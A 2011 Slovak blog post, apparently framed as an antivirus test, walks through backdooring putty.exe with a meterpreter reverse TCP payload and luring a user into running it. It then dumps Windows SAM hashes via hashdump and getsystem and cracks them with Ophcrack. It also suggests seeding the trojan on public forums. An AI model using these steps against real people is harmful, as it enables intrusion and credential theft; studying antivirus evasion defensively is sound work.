2011
Námet na tento článok (prvý zo série) je doslova zo života. Ani pri tretej inštalácii systému Windows XP sa mi príslušníčku ženského pohlavia nepodarilo presvedčiť, že a) nie je dobrý nápad používať Windows s právami administrátora, b) administrátorský účet by mal byť chránený silným heslom c) je dôležité vybrať si dobrý antivírusový softvér. Už dávnejšie bolo v pláne spísať niečo ohľadom Ophcrack a backdoorovania exe súborov pomocou Metasploit Framework. Ovládnutie počítača nemusí nutne súvisieť s exploitovaním systému. Často stačí trocha sociálneho inžinierstva. Máme teda všetko v jednom, azda sa v niektorej časti nájdete. Ak zašlete známemu putty.exe s informáciou, že ide o vylepšenú verziu ktorá mu ušetrí čas a je príjemná na ovládanie, myslíte, že sa nepozrie? Zavesíte toto „info“ na verejné IT fórum a … Náš príbeh sa začína prebalením putty.exe za spusiteľný súbor cenník-plus.exe, ktorý obsahuje meterpreter reverse tcp payload. Tento dopravíme na systém Windows XP (voliteľne) a „dumpneme“ si hash, ktorý prelúskame pomocou Ophcrack.
Podmienkou celej tejto hry je fakt, že antivírusový softvér neodhalí meterpreter reverse payload v tomto prípade enkódovaný pomocou Shikata ga Nai. Úprimne ak by som mal za úlohu kompromitovať podnikovú sieť, mojou prvou voľbou by bolo rozposlať infikované PDF, nie exe súbory, ktorým sa v spoločnostiach venuje mimoriadna pozornosť. Druhou voľbou by bol šikovne podvrhnutý e-mail nabádajúci navštíviť zaujímavú web stránku a treťou (ktorý som zažil pri poslednom audite) rozdanie 100 kusov prezentačných usb kľúčov s priloženým malým darčekom v podobe „trójskeho koňa“. O tom ale v ďalších článkoch, v ktorým si otestujeme schopnosti rôznych (NOD32, Norton, AVG, Avast, Kaspersky) antivírusových systémov zachytávať bežne dostupné hračky na CD/DVD/USB médiách, v PDF súboroch, WORDovských dokumentoch… Časť prvá – hashdump.
Pt. 1 – Panda Antivirus Pro 2011
Vytvoríme si teda náš šikovný cenník odosielajúci meterpreter reverse tcp na lokálnu IP adresu pomocou msfpayload:
Nakupovania chtivá Mariana kliká na zaslaný exe súbor, zatiaľ čo jej spoľahlivý a plne aktualizovaný antivírus ani nepípne 
Payload zachytáva nakonfigurovaný Generic Payload Handler pre platformy Windows, Linux, Solaris, Unix, OSX, BSD, PHP, Java. Príkazom getprivs zisťujeme privilégiá a áno Mariana má práva administrátora:
hashdump
Security Accounts Manager - SAM je súbor registrov Windows, v ktorom sú uložené heslá užívateľov v LM hash a NTLM hash, ktorý vychádza z DES – Data Encryption Standard používajúci iba 56-bitové šifrovanie. Vďaka zraniteľnosti v implementácii je možné získať heslá užívateľov pomerne jednoducho. LM hash bol v novších systémoch ako Windows Vista a Windows Server 2008 nahradený posilneným NTLMv2, alebo Kerberos protokolom. Podpora pre LM ostáva, z dôvodu spätnej kombatiblility, defaultne je ale vypnutá.
a) Meterpreter skript pre automatické dump hashov zlyháva z dôvodu nedostatočných práv pri pokuse dolovať z C:\WINDOWS\system32\config. Ručne si vyhľadáme systémový proces, ktorý nám dovolí „grabnúť“ si SAM:
meterpreter > ps
Process list
============
PID Name Arch Session User Path
— —- —- ——- —- —-
0 [System Process]
4 System x86 0 NT AUTHORITY\SYSTEM
380 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
524 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
552 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
608 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
1540 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1316 ApVxdWin.exe x86 0 BAZINGA-D12B07A\marianna C:\Program Files\Panda Security\Panda Antivirus Pro
2011\APVXDWIN.EXE
1880 ctfmon.exe x86 0 BAZINGA-D12B07A\marianna C:\WINDOWS\system32\ctfmon.exe
3120 alg.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe
2156 wuauclt.exe x86 0 BAZINGA-D12B07A\marianna C:\WINDOWS\system32\wuauclt.exe
1892 avciman.exe x86 0 BAZINGA-D12B07A\marianna C:\Program Files\Panda Security\Panda Antivirus Pro
…
– po migrácii do vybraného systémového procesu - Print+Fax Spooler (pid 1540) meterpreter skript nenamieta a máme hľadané hashe:
hashdump
b) Meterpreter skript getsystem automaticky zabezpečí požadované oprávnenie a následne znova dostávame hashe.
Ukladáme úlovok do textového súboru pre ďalšie použitie. A čo na to všetko naša Panda? Sladko spí ako medvedík Na druhej strane po desiatkach minút ukladá AV náš súbor do karantény. Aj 3 minúty ale stačia na ručné vytvorenie desiatok zadných vrátok… Prvotný fail je, že AV vôbec dovolí stiahnutie takéhoto súboru zo siete Internet do počítača.
Pri prístupe k disku za pomoci live cd (BackTrack, Ophcrack live cd…), alebo ekvivalentu použijeme samdump2 – utilitku na získahe SAM hashov zo systémov Windows 2k/NT/XP.
Krásny skript existuje pod názvom HashGrab v2.0, ktorý je najrýchlejšia cesta ako si zabezpečiť LM hashe:
http://stashbox.org/879658/hashgrab2.zip
Ophcrack
- open source program pre systémy Linux/Unix, Mac OS X a Windows umožnujúci crack LM a NTLM hashov pod GPL licenciou využívajúci rainbow tabuľky. Aktuálna verzia je Ophcrack 3.3.1 a ophcrack je dostupné aj ako LiveCD akutuálne v. 2.3.1 Pre heslá pozostávajúce z maximálne 14 alfanumerických znakov sú zdarma dostupné tabuľky XP free small, XP free fast a Vista free priamo na webe Ophcrack. Mimochodom jediný rozdiel medzi XP free small a XP free fast je ten, že ak používate počítač s menej ako 512 RAM použite prvé spomínané. Zvyšné tabuľky sú spoplatnené a distribuované prostredníctvom Objectif Securite. Po stiahnutí a rozbalení sú heslá dostupné v priebehu minút:
Ak si myslíte, že 10 miestne heslo pozostávajúce z čísel a písmen je pre Ophcrack problém tak opak je pravdou. Jedno z mojich alfanumerických hesiel padlo za menej ako 5 sekúnd.
Ok, viem, možno si poviete, že hodnotiť serióznosť antivírusového softvéru podľa jednoduchých pokusov nie je fér. Možno máte pravdu, možno nie. Bez ohľadu na výsledok prípadnej polemiky, budeme testovať jednotlivé AV voči dostupným technikám a publikovať výsledky. AV bude v čase testu stále plne aktualizovaný a zvolený pokus o prienik sa bude sa bude meniť. Nečakám, že s pozitívnym výsledkom na infiltráciu sa stretneme pri všetkých produktoch, publikovať budeme aj neúspešné pokusy Ak AV nezachytí bežné, aj keď celkom sofistikované „hračky“, ako na tom asi budú dômyselné vírusy, wormy a trójske kone? Netvrdím, že tieto testy budú poukazovať na kvalitu AV, budeme sa jednoducho snažiť obísť tieto AV zo všetkým čo je bežne dostupné v sieti Internet.
K dnešnému testu, myslím, že na trhu je ešte väčší BS ako je Panda, žiaľ nie je dostupná časovo obmedzená vezia pre test a tých 13 € sa dá v rovnakom obchodnom dome utratiť napr. za grilované kurča, predávajú sa totiž pod rovnakou značkou Viete kam mierim?
Súvisiace články: AV play, pt. 2 |flash & java| AV play, pt. 3 |SET Multi-Encoder|, AV play, pt. 4 |template.c|, AV play, pt. 5 |Adobe Reader|, Metaspl0it keystroke sniffing?, Social engineering Metaspl0it?
Žádný komentář.
Přidat komentář